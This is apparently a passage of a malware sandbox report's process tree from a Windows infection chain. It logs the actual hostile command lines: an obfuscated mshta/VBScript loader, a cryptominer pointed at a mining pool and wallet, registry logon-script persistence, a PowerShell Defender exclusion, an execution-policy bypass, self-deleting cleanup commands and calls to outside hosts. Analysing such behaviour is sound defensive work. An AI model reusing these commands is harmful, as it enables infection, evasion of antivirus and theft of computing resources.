                                                              "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                              7⤵
                                                                PID:5364
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                              6⤵
                                                              • Loads dropped DLL
                                                              PID:7020
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill -IM "7IgXQzFxTTuSjG80fESaBsPC.exe" -f
                                                            5⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2300
                                                    • C:\Users\Admin\Documents\mAui49Ktxo0LETiPcPmZbMnE.exe
                                                      "C:\Users\Admin\Documents\mAui49Ktxo0LETiPcPmZbMnE.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3240
                                                    • C:\Users\Admin\Documents\K9CQV_GfCOC7vitQG_4aLlma.exe
                                                      "C:\Users\Admin\Documents\K9CQV_GfCOC7vitQG_4aLlma.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:2576
                                                      • C:\Users\Admin\Documents\K9CQV_GfCOC7vitQG_4aLlma.exe
                                                        C:\Users\Admin\Documents\K9CQV_GfCOC7vitQG_4aLlma.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4620
                                                    • C:\Users\Admin\Documents\3a21ylkA1ueyuboxU1qNCmUl.exe
                                                      "C:\Users\Admin\Documents\3a21ylkA1ueyuboxU1qNCmUl.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1272
                                                    • C:\Users\Admin\Documents\IgM6dHRr6YvcpGag_HvFho_x.exe
                                                      "C:\Users\Admin\Documents\IgM6dHRr6YvcpGag_HvFho_x.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:1576
                                                      • C:\Users\Admin\Documents\IgM6dHRr6YvcpGag_HvFho_x.exe
                                                        C:\Users\Admin\Documents\IgM6dHRr6YvcpGag_HvFho_x.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4612
                                                    • C:\Users\Admin\Documents\cv158oHpr4eF_f97J6fTM3nx.exe
                                                      "C:\Users\Admin\Documents\cv158oHpr4eF_f97J6fTM3nx.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:3652
                                                      • C:\Users\Admin\Documents\cv158oHpr4eF_f97J6fTM3nx.exe
                                                        "C:\Users\Admin\Documents\cv158oHpr4eF_f97J6fTM3nx.exe" -q
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:5024
                                                    • C:\Users\Admin\Documents\xJgRXzOiSMnkp3dpusOaJOWe.exe
                                                      "C:\Users\Admin\Documents\xJgRXzOiSMnkp3dpusOaJOWe.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2088
                                                    • C:\Users\Admin\Documents\Tvs0dzs6LLswPSgKhb1JUkRM.exe
                                                      "C:\Users\Admin\Documents\Tvs0dzs6LLswPSgKhb1JUkRM.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:928
                                                      • C:\Users\Admin\Documents\Tvs0dzs6LLswPSgKhb1JUkRM.exe
                                                        "C:\Users\Admin\Documents\Tvs0dzs6LLswPSgKhb1JUkRM.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:6680
                                                    • C:\Users\Admin\Documents\n8Q7gsE0A7eR0TBk65Wc6TTG.exe
                                                      "C:\Users\Admin\Documents\n8Q7gsE0A7eR0TBk65Wc6TTG.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:4640
                                                      • C:\Users\Admin\AppData\Local\Temp\is-8JNB5.tmp\n8Q7gsE0A7eR0TBk65Wc6TTG.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-8JNB5.tmp\n8Q7gsE0A7eR0TBk65Wc6TTG.tmp" /SL5="$2029C,138429,56832,C:\Users\Admin\Documents\n8Q7gsE0A7eR0TBk65Wc6TTG.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:4760
                                                        • C:\Users\Admin\AppData\Local\Temp\is-B7K4L.tmp\Setup.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-B7K4L.tmp\Setup.exe" /Verysilent
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:6140
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5172
                                                            • C:\Users\Admin\AppData\Local\Temp\is-VPN07.tmp\Stats.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-VPN07.tmp\Stats.tmp" /SL5="$10394,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5632
                                                              • C:\Users\Admin\AppData\Local\Temp\is-SSOVM.tmp\builder.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-SSOVM.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                7⤵
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:7064
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:5628
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 760
                                                              6⤵
                                                              • Program crash
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4804
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 780
                                                              6⤵
                                                              • Program crash
                                                              PID:5616
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 784
                                                              6⤵
                                                              • Program crash
                                                              PID:7132
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 852
                                                              6⤵
                                                              • Program crash
                                                              PID:4492
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1056
                                                              6⤵
                                                              • Program crash
                                                              PID:5496
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1032
                                                              6⤵
                                                              • Program crash
                                                              PID:2164
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1112
                                                              6⤵
                                                              • Program crash
                                                              PID:7696
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1140
                                                              6⤵
                                                              • Program crash
                                                              PID:8188
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1064
                                                              6⤵
                                                              • Program crash
                                                              PID:8144
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:5584
                                                            • C:\Users\Admin\AppData\Local\Temp\is-03OGE.tmp\Inlog.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-03OGE.tmp\Inlog.tmp" /SL5="$103AC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5936
                                                              • C:\Users\Admin\AppData\Local\Temp\is-GJCST.tmp\Setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-GJCST.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                7⤵
                                                                  PID:4984
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-99754.tmp\Setup.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-99754.tmp\Setup.tmp" /SL5="$4056A,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-GJCST.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:5620
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-502TQ.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                      9⤵
                                                                        PID:5016
                                                                        • C:\Windows\SysWOW64\expand.exe
                                                                          expand C:\Users\Admin\AppData\Local\Temp\is-502TQ.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                          10⤵
                                                                          • Drops file in Windows directory
                                                                          PID:7956
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        PID:7012
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                          10⤵
                                                                            PID:6388
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-502TQ.tmp\{app}\vdi_compiler.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-502TQ.tmp\{app}\vdi_compiler"
                                                                          9⤵
                                                                            PID:8620
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                            9⤵
                                                                              PID:6388
                                                                            • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                              "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                              9⤵
                                                                              • Loads dropped DLL
                                                                              PID:5656
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Enumerates connected drives
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:5652
                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579452 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                        6⤵
                                                                          PID:1692
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:5756
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-GFU4M.tmp\WEATHER Manager.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-GFU4M.tmp\WEATHER Manager.tmp" /SL5="$301C8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:5816
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-V9BGS.tmp\Setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-V9BGS.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                            7⤵
                                                                            • Loads dropped DLL
                                                                            • Enumerates connected drives
                                                                            • Modifies system certificate store
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:6292
                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-V9BGS.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-V9BGS.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579452 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                              8⤵
                                                                                PID:5288
                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:5712
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-EIASI.tmp\MediaBurner2.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-EIASI.tmp\MediaBurner2.tmp" /SL5="$303F8,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:6284
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-JAQE4.tmp\ultradumnibour.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-JAQE4.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                              7⤵
                                                                              • Drops file in Drivers directory
                                                                              • Adds Run key to start application
                                                                              PID:4584
                                                                              • C:\Users\Admin\AppData\Local\Temp\XZSPOWFDTG\ultramediaburner.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\XZSPOWFDTG\ultramediaburner.exe" /VERYSILENT
                                                                                8⤵
                                                                                  PID:7536
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JBVO2.tmp\ultramediaburner.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-JBVO2.tmp\ultramediaburner.tmp" /SL5="$105FA,281924,62464,C:\Users\Admin\AppData\Local\Temp\XZSPOWFDTG\ultramediaburner.exe" /VERYSILENT
                                                                                    9⤵
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:7668
                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                      10⤵
                                                                                        PID:8280
                                                                                  • C:\Users\Admin\AppData\Local\Temp\27-a37cc-ecc-b7392-d6fd4e3629dda\Lyzhexiceha.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\27-a37cc-ecc-b7392-d6fd4e3629dda\Lyzhexiceha.exe"
                                                                                    8⤵
                                                                                    • Checks computer location settings
                                                                                    PID:8468
                                                                                  • C:\Users\Admin\AppData\Local\Temp\23-6e853-5e9-f5db2-ebb2d96b1102b\Bulaloxoto.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\23-6e853-5e9-f5db2-ebb2d96b1102b\Bulaloxoto.exe"
                                                                                    8⤵
                                                                                      PID:8580
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dryaiwfz.q4j\GcleanerEU.exe /eufive & exit
                                                                                        9⤵
                                                                                          PID:2940
                                                                                          • C:\Users\Admin\AppData\Local\Temp\dryaiwfz.q4j\GcleanerEU.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\dryaiwfz.q4j\GcleanerEU.exe /eufive
                                                                                            10⤵
                                                                                              PID:9764
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\dryaiwfz.q4j\GcleanerEU.exe" & exit
                                                                                                11⤵
                                                                                                  PID:7484
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im "GcleanerEU.exe" /f
                                                                                                    12⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:7000
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z511ufev.q5c\installer.exe /qn CAMPAIGN="654" & exit
                                                                                              9⤵
                                                                                                PID:9492
                                                                                                • C:\Users\Admin\AppData\Local\Temp\z511ufev.q5c\installer.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\z511ufev.q5c\installer.exe /qn CAMPAIGN="654"
                                                                                                  10⤵
                                                                                                    PID:9904
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gnt5jlnr.tje\anyname.exe & exit
                                                                                                  9⤵
                                                                                                    PID:7280
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\gnt5jlnr.tje\anyname.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\gnt5jlnr.tje\anyname.exe
                                                                                                      10⤵
                                                                                                        PID:9724
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gnt5jlnr.tje\anyname.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\gnt5jlnr.tje\anyname.exe" -q
                                                                                                          11⤵
                                                                                                            PID:9036
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hyvobwl5.lkr\gcleaner.exe /mixfive & exit
                                                                                                        9⤵
                                                                                                          PID:7300
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\hyvobwl5.lkr\gcleaner.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\hyvobwl5.lkr\gcleaner.exe /mixfive
                                                                                                            10⤵
                                                                                                              PID:4200
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hyvobwl5.lkr\gcleaner.exe" & exit
                                                                                                                11⤵
                                                                                                                  PID:8548
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /im "gcleaner.exe" /f
                                                                                                                    12⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:8460
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pigjezgl.x4l\autosubplayer.exe /S & exit
                                                                                                              9⤵
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:9848
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks computer location settings
                                                                                                      PID:5884
                                                                                                      • C:\Users\Admin\Documents\WjYH6J4GFxqEUDoV3sje3rQs.exe
                                                                                                        "C:\Users\Admin\Documents\WjYH6J4GFxqEUDoV3sje3rQs.exe"
                                                                                                        6⤵
                                                                                                          PID:7096
                                                                                                        • C:\Users\Admin\Documents\wtdmeSiO49IQ_i_LexIhnbl_.exe
                                                                                                          "C:\Users\Admin\Documents\wtdmeSiO49IQ_i_LexIhnbl_.exe"
                                                                                                          6⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:6188
                                                                                                          • C:\Users\Admin\Documents\wtdmeSiO49IQ_i_LexIhnbl_.exe
                                                                                                            C:\Users\Admin\Documents\wtdmeSiO49IQ_i_LexIhnbl_.exe
                                                                                                            7⤵
                                                                                                              PID:7292
                                                                                                          • C:\Users\Admin\Documents\Gmrfw_8vKXB7rlG6edeRGH5P.exe
                                                                                                            "C:\Users\Admin\Documents\Gmrfw_8vKXB7rlG6edeRGH5P.exe"
                                                                                                            6⤵
                                                                                                              PID:6504
                                                                                                              • C:\Users\Admin\Documents\Gmrfw_8vKXB7rlG6edeRGH5P.exe
                                                                                                                "C:\Users\Admin\Documents\Gmrfw_8vKXB7rlG6edeRGH5P.exe" -q
                                                                                                                7⤵
                                                                                                                  PID:5460
                                                                                                              • C:\Users\Admin\Documents\NEJESHSm4zkTWOJMkz9nL1st.exe
                                                                                                                "C:\Users\Admin\Documents\NEJESHSm4zkTWOJMkz9nL1st.exe"
                                                                                                                6⤵
                                                                                                                  PID:7160
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\NEJESH~1.DLL,s C:\Users\Admin\DOCUME~1\NEJESH~1.EXE
                                                                                                                    7⤵
                                                                                                                    • Blocklisted process makes network request
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:5672
                                                                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\NEJESH~1.DLL,LAshM1Mx
                                                                                                                      8⤵
                                                                                                                      • Blocklisted process makes network request
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Modifies system certificate store
                                                                                                                      PID:7160
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\NEJESH~1.DLL
                                                                                                                        9⤵
                                                                                                                          PID:3596
                                                                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\NEJESH~1.DLL,mUpOR05YOEU=
                                                                                                                          9⤵
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:10712
                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                            C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                                                                                            10⤵
                                                                                                                              PID:10824
                                                                                                                              • C:\Windows\system32\ctfmon.exe
                                                                                                                                ctfmon.exe
                                                                                                                                11⤵
                                                                                                                                  PID:10280
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpA3C5.tmp.ps1"
                                                                                                                              9⤵
                                                                                                                                PID:6152
                                                                                                                        • C:\Users\Admin\Documents\HQ_Nxk0MM2m7nO7FpLSZHrLS.exe
                                                                                                                          "C:\Users\Admin\Documents\HQ_Nxk0MM2m7nO7FpLSZHrLS.exe"
                                                                                                                          6⤵
                                                                                                                            PID:5312
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "HQ_Nxk0MM2m7nO7FpLSZHrLS.exe" /f & erase "C:\Users\Admin\Documents\HQ_Nxk0MM2m7nO7FpLSZHrLS.exe" & exit
                                                                                                                              7⤵
                                                                                                                                PID:5428
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im "HQ_Nxk0MM2m7nO7FpLSZHrLS.exe" /f
                                                                                                                                  8⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:8716
                                                                                                                            • C:\Users\Admin\Documents\s1JgoglxRdPDTj3SIyzEPnUr.exe
                                                                                                                              "C:\Users\Admin\Documents\s1JgoglxRdPDTj3SIyzEPnUr.exe"
                                                                                                                              6⤵
                                                                                                                                PID:7204
                                                                                                                              • C:\Users\Admin\Documents\vki4tvosSaJLjUZ7PFuV7MLg.exe
                                                                                                                                "C:\Users\Admin\Documents\vki4tvosSaJLjUZ7PFuV7MLg.exe"
                                                                                                                                6⤵
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                PID:7196
                                                                                                                              • C:\Users\Admin\Documents\0CfZw2QRxq9wT_1M7R04cQFl.exe
                                                                                                                                "C:\Users\Admin\Documents\0CfZw2QRxq9wT_1M7R04cQFl.exe"
                                                                                                                                6⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:7188
                                                                                                                                • C:\Users\Admin\Documents\0CfZw2QRxq9wT_1M7R04cQFl.exe
                                                                                                                                  C:\Users\Admin\Documents\0CfZw2QRxq9wT_1M7R04cQFl.exe
                                                                                                                                  7⤵
                                                                                                                                    PID:7152
                                                                                                                                • C:\Users\Admin\Documents\hkFhFtuV7hUoW8j2kRSVc8KZ.exe
                                                                                                                                  "C:\Users\Admin\Documents\hkFhFtuV7hUoW8j2kRSVc8KZ.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:7456
                                                                                                                                • C:\Users\Admin\Documents\cFh8PX6LzsVINygoy0vJulqv.exe
                                                                                                                                  "C:\Users\Admin\Documents\cFh8PX6LzsVINygoy0vJulqv.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  PID:7448
                                                                                                                                • C:\Users\Admin\Documents\6nO7f06vwxv2Y5pKGq5rk7T2.exe
                                                                                                                                  "C:\Users\Admin\Documents\6nO7f06vwxv2Y5pKGq5rk7T2.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:7440
                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                      "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\6nO7f06vwxv2Y5pKGq5rk7T2.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\6nO7f06vwxv2Y5pKGq5rk7T2.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                      7⤵
                                                                                                                                        PID:4368
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\6nO7f06vwxv2Y5pKGq5rk7T2.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\6nO7f06vwxv2Y5pKGq5rk7T2.exe" ) do taskkill -IM "%~nXW" -f
